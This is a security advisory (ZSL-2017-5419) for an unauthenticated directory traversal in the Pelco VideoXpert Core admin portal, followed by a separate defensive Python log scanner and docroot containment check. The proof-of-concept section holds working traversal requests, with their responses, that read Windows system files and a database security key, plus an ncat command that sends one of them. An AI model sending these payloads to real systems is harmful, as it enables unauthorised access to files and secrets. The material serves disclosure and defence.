Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal


Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
                  1.14.7
                  1.12.105

Summary: VideoXpert is a video management solution designed for scalability,
fitting the needs of surveillance operations of any size. VideoXpert Ultimate
can also aggregate other VideoXpert systems, tying multiple video management
systems into a single interface.

Desc: Pelco VideoXpert suffers from a directory traversal vulnerability in the
Core admin portal. The portal accepts path segments built from backslashes and
repeated separators, so an unauthenticated attacker can step out of the web root
and read arbitrary files on the host with the privileges of the web server
process. The PoC below retrieves files from the Windows system directory and
the Core database security key from ProgramData.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Jetty(9.2.6.v20141205)
           MongoDB/3.2.10


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5419
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php

05.04.2017

--


PoC:
----

GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


HTTP/1.1 200 OK
Date: Wed, 05 Apr 2017 13:27:39 GMT
Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
ETag: 1247548162000
Content-Length: 403
Connection: close

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

------

GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 11:59:07 GMT
Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1491397116000
Content-Length: 9
Connection: close

T0ps3cret

------

bash-4.4$ cat pelco_system_ini.txt
GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 172.19.0.198:80.
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 12:30:01 GMT
Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1244668084000
Content-Length: 219
Connection: close

; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
bash-4.4$
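The PoC above mixes forward slashes, runs of backslashes and doubled separators so that a naive "../" filter never sees a clean "../". The following is an added example, not part of the advisory and not Pelco or VideoXpert code. It does two things a practitioner wants after reading this PoC: it scans access-log lines (NCSA common log format, the shape Jetty's request log can emit) for request paths that contain a ".." segment once backslashes, separator runs and percent-encoding are normalised away, and it shows the docroot containment check a handler should apply before opening a file. The docroot path, the log lines and the URL-to-filesystem mapping are constructed assumptions for the demo.

```python
"""
Added example (not part of ZSL-2017-5419 or of Pelco/VideoXpert code).

  1. flag_traversal(): scan NCSA-style access log lines for request paths
     that carry a '..' segment after normalisation, so a path built from
     backslashes and doubled separators is caught the same as /portal/../..
  2. resolve_in_docroot(): containment check a file handler should apply;
     it rejects the PoC path and accepts an ordinary one.

DOCROOT and SAMPLE_LOG are constructed for this demo, not taken from a real host.
"""
import posixpath
import re
from urllib.parse import unquote

# Request line and status from a common-log-format line; the path may hold backslashes.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

DOCROOT = "/opt/vxcore/www"   # assumed layout: the URL path is joined below this


def decode_path(raw: str) -> str:
    """Canonicalise a request path the way a Windows-hosted server ends up
    treating it: drop the query string, percent-decode twice (catches double
    encoding), treat backslash as a separator, collapse separator runs."""
    p = raw.split("?", 1)[0]
    for _ in range(2):
        p = unquote(p)
    p = p.replace("\\", "/")
    return re.sub(r"/+", "/", p)


def has_dotdot(raw: str) -> bool:
    """True if any path segment is '..' after normalisation."""
    return ".." in decode_path(raw).split("/")


def flag_traversal(log_lines):
    """Return (raw_path, status) for each request carrying a '..' segment.
    A 200 on such a request is the signal that the file was actually served."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and has_dotdot(m.group("path")):
            hits.append((m.group("path"), int(m.group("status"))))
    return hits


def resolve_in_docroot(docroot: str, raw: str):
    """Map a request path onto the filesystem and refuse anything that lands
    outside docroot. Returns the resolved path, or None when rejected."""
    root = posixpath.normpath(docroot)
    rel = decode_path(raw).lstrip("/")
    full = posixpath.normpath(posixpath.join(root, rel))
    if full == root or full.startswith(root + "/"):
        return full
    return None


# Constructed log lines shaped like the advisory's requests (not real logs).
SAMPLE_LOG = [
    r'172.19.0.5 - - [05/Apr/2017:13:27:39 +0000] "GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1" 200 403',
    r'172.19.0.5 - - [05/Apr/2017:13:28:01 +0000] "GET /portal/index.html HTTP/1.1" 200 1532',
    r'172.19.0.7 - - [06/Apr/2017:11:59:07 +0000] "GET /portal/%2e%2e/%2e%2e/ProgramData/Pelco/Core/db/security/key.pem HTTP/1.1" 200 9',
    r'172.19.0.9 - - [06/Apr/2017:12:30:01 +0000] "GET /portal/css/app.css?v=2 HTTP/1.1" 304 0',
]

if __name__ == "__main__":
    for path, status in flag_traversal(SAMPLE_LOG):
        print(f"traversal attempt: {path} -> HTTP {status}")
    for req in (r"/portal//..\\\..\\\..\\\..\\\windows\win.ini", "/portal/index.html"):
        print(req, "=>", resolve_in_docroot(DOCROOT, req))
```

The detector normalises before looking for "..", which is the point: matching the literal string "../" in raw request lines misses both the backslash form in the PoC and the percent-encoded form. The containment check works on the normalised, joined path rather than on the request string, so the decision does not depend on which encoding the client chose.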